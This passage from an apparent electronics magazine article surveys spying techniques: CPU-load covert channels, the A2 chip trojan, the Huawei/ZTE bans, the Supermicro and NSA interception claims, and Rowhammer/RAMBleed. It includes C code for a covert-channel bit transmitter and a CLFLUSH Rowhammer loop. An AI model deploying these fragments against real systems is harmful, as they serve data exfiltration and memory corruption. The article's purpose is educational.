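#define BIT_PERIOD_MS 500L  // assumed symbol time, chosen arbitrarily

static void busy_wait_ms(long ms)
{
    struct timespec start, now;
    clock_gettime(CLOCK_MONOTONIC, &start);
    volatile unsigned long sink = 0;
    do {
        sink++;  // pointless work keeps the CPU load high
        clock_gettime(CLOCK_MONOTONIC, &now);
    } while ((now.tv_sec - start.tv_sec) * 1000 +
             (now.tv_nsec - start.tv_nsec) / 1000000 < ms);
}

static void idle_ms(long ms)
{
    // sleeping drops the CPU load (and hence emissions) to near zero
    struct timespec t = { ms / 1000, (ms % 1000) * 1000000 };
    nanosleep(&t, NULL);
}

// Transmit one byte, most significant bit first.
static void send_byte(unsigned char byte)
{
    for (int bit = 7; bit >= 0; bit--) {
        if ((byte >> bit) & 1)
            busy_wait_ms(BIT_PERIOD_MS);  // '1': high load
        else
            idle_ms(BIT_PERIOD_MS);       // '0': low load
    }
}
```

The receiver (a magnetometer, thermal sensor or smartphone, depending on the technique) simply samples its sensor and applies a threshold to recover the bit stream, which is why the demonstrated data rates are so low.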
Manufactured devices with design altered for
espionage
Installing malware or hardware exploits into computer systems is bad enough, but consider that a “backdoor”
could be built into a CPU or other important chip like a
GPU (graphics processing unit). It would be virtually undetectable.
This exact scenario was tested by researchers at the University of Michigan in 2016. This attack, which the researchers called A2, was shown to work because chip designers
typically do not have full control over their design. Once
a CPU or other chip is designed, it is sent to a third party
for manufacturing.
The chip development company ensures their design has
not been tampered with by testing the fabricated chips, to
ensure they behave as intended.
But in this particular attack, the malicious circuitry was
only activated by an extremely unusual sequence of events
repeated multiple times, which the original designers could
not possibly envisage or test for.
In the scenario tested by researchers K. Yang et al, they
modified the circuit by adding capacitors to the chip circuitry or “mask”, which siphoned off power from nearby
wires as they transitioned from one logic state to another.
But this only occurred during the execution of an unusual
operation, which could easily be triggered by the attackers.
When those capacitors eventually gained a full charge, they
caused a transition in the state of a selected flip-flop holding
the ‘privilege bit’ for the processor, enabling full control of
the computer by any user.
The attack was tested on an open-source chip design
(OpenRISC 1200 CPU – see Fig.17) but could be adapted
to virtually any CPU.
Because this sort of attack is possible, companies with
suspect behaviour have been banned or restricted from certain activities by governments.
For example, Chinese manufacturers Huawei and ZTE
have been banned in Australia from involvement in the 5G
network due to security concerns (Fig.18).
Fig.18: the announcement that Huawei and ZTE have
been banned by the Federal Government from providing
5G technology in Australia.
Fig.19: the claimed Chinese espionage chip
supposedly found built into Supermicro
motherboards, along with a pencil for size
comparison. It is now doubtful that such a
chip actually exists, but such an attack is
theoretically possible.
The Federal Government has a general
guideline that says there is too much risk
using companies that are “likely to be
subject to extrajudicial directions from
a foreign government that conflict with
Australian law”; see: siliconchip.com.au/link/aard
The concern is that there might be pressure from the Chinese government for these companies to install backdoors
into the equipment, which could later be used for espionage
(eg, listening to ministers’ private conversations). The government has made no direct public statement advising of
the ban, but the affected companies were informed.
Huawei has also been in the news recently, having been
banned from doing business with the United States over
similar concerns.
Huawei and ZTE were also investigated by the US House
Intelligence Committee in 2012 over concerns that their
equipment might be sending intelligence back to the Chinese government.
The Committee recommended that US companies should
not purchase telecommunications equipment from either
company as a result.
ZTE eventually had their restrictions on US trade relaxed in exchange for paying a US$1 billion fine, as well
as undergoing a nearly complete management change and accepting oversight
from a US compliance team.
Currently, the only restriction placed on ZTE by the USA
is that their devices will not be considered in US government purchasing contracts.
The ZTE trading ban was in retaliation for selling their
products to Iran and North Korea, but ZTE is and was much
more dependent on US manufacturers for chips than Huawei. Thus, the damage to ZTE was greater and they were
therefore keener to have that ban lifted.
See: siliconchip.com.au/link/aaso and siliconchip.com.au/link/aasp
Equipment intercepted and altered before
delivery
In 2002, the Chinese claimed that a Boeing 767 purchased
from the United States to serve the Chinese President Jiang
Zemin yielded a total of 27 bugs, which they claimed had
been planted by the CIA when the aircraft was undergoing
conversion work to a VIP aircraft in Texas.
As with the 767 incident, other devices can be intercepted
and altered for espionage purposes at some point between
manufacture and delivery of the item to the end user.
In late 2018, there was a claim by Bloomberg News that
US computer server manufacturer Supermicro had been
compromised during manufacturing in China, by the insertion of a tiny espionage chip that could enable the transmission of data from the computer or its network to malicious
actors (see Fig.19).
This claim has since been thoroughly investigated and
is now widely believed to be untrue. Investigations were
conducted by companies including Apple and Amazon,
who were Supermicro customers, and the US Department
of Homeland Security and the UK’s National Cyber Security Centre.
Supermicro’s reputation was still damaged though, and
they note the difficulty of proving a negative (ie, that the
malicious chips don’t exist). But that does not mean that
this particular method is impossible.
NSA Cisco router hacks
Security documents and photos were leaked depicting
a US NSA “upgrade” facility called TAO (Tailored Access
Operations) for Cisco and other tech devices.
It was claimed the NSA would intercept shipped devices and use this facility to install backdoors or similar exploits before delivering the products to the end users, who
were presumably unaware that the product(s) had been altered. See: siliconchip.com.au/link/aasq and siliconchip.com.au/link/aasr
Rowhammer and RAMBleed
Rowhammer is an exploit involving DRAM memory, in
which the memory cells inadvertently leak electrical charge
into adjacent cells, thus causing those cells to change their
contents.
This leakage effect rarely or never occurs in DDR or DDR2
type SDRAM modules, but is known to occur in some
DDR3 and DDR4 modules because of their much higher
chip density.
Normal leakage of the electrical charge representing a
memory state is usually compensated for by regularly rereading the memory element and then rewriting the data.
This is called ‘refreshing’ and is normally done every 64ms.
But with Rowhammer, memory rows are deliberately read
over and over, with the Cache Line Flush (CLFLUSH) instruction used to force each read to go all the way to the DRAM
itself; this ‘hammering’ causes bits in adjacent memory rows
to flip. Such rapid repeated access to DRAM is normally
prevented by caching, but the cache is bypassed by CLFLUSH.
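The hammering loop at the heart of the technique is tiny. The following is an illustrative C sketch of the kind of loop used in published Rowhammer demonstrations; addr1 and addr2 are assumed to map to different rows in the same DRAM bank, and finding such address pairs (not shown here) is the difficult part. On ordinary memory, this code is harmless; flips only occur on susceptible DDR3/DDR4 modules after a very large number of row activations.

```c
#include <stdint.h>
#include <emmintrin.h>  // _mm_clflush(), the x86 CLFLUSH intrinsic

// Repeatedly activate two DRAM rows. The CLFLUSH after each read
// evicts the data from the CPU cache, so the next read must go all
// the way to DRAM, re-activating the row each time.
static void hammer(volatile uint8_t *addr1, volatile uint8_t *addr2,
                   long iterations)
{
    for (long i = 0; i < iterations; i++) {
        (void)*addr1;                      // read forces a row activation
        (void)*addr2;
        _mm_clflush((const void *)addr1);  // bypass the cache, as
        _mm_clflush((const void *)addr2);  // described in the text
    }
    // On vulnerable modules, enough activations between 64ms
    // refreshes can flip bits in the rows adjacent to these two.
}
```

Note that nothing here requires special privileges, which is what makes the attack so troubling: any user process that can read its own memory fast enough can attempt it.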
The deliberate altering of data in adjacent memory rows
has been used as a basis for the attacker to gain extra access
privileges in the system under attack such as by altering
control structures in memory. In one implementation of a
Rowhammer attack, sensitive data such as passwords can
be extracted from the leaking memory cells.
Rowhammer cannot be easily fixed with security software or operating system updates, and perhaps not at all.
The RAMBleed attack uses Rowhammer to identify bits
that can easily be flipped, even when ECC (error-correcting
code) memory is used. These flippable bits are then used to read
out the desired memory contents.
One of the researchers who discovered this vulnerability, Yuval
Yarom (University of Adelaide), described RAMBleed as
“a side-channel attack that enables an attacker to read out
physical memory belonging to other processes”.
RAMBleed can theoretically be used to read any data in
physical memory. A read rate of 3-4 bits per second has
been demonstrated. Therefore, data such as passwords or
encryption keys can be read in a relatively short time if the
location of the data in memory is known.
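To put the bit rates quoted in this article in perspective, a quick calculation (the secret sizes below are arbitrary examples, not figures from the papers) shows how long exfiltrating typical secrets would take:

```c
#include <assert.h>

// Seconds needed to exfiltrate 'bits' of data over a covert
// channel running at 'bits_per_sec'.
static double exfil_seconds(double bits, double bits_per_sec)
{
    return bits / bits_per_sec;
}

// Worked examples using rates quoted in the text:
//  - RAMBleed reads ~3 bits per second, so a 2048-bit key takes
//    exfil_seconds(2048, 3.0), roughly 683 seconds (about 11 minutes).
//  - Fansmitter sends 900 bits per hour (0.25 bits per second), so
//    even a 64-bit secret takes exfil_seconds(64, 0.25) = 256 seconds.
```

Slow as these channels are, they are fast enough to steal passwords and encryption keys, which is why air-gap exfiltration research attracts so much attention.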
SC
Next month, as promised in the intro, we’ll have the
details on many more electronic spying techniques, especially bugging and covert surveillance.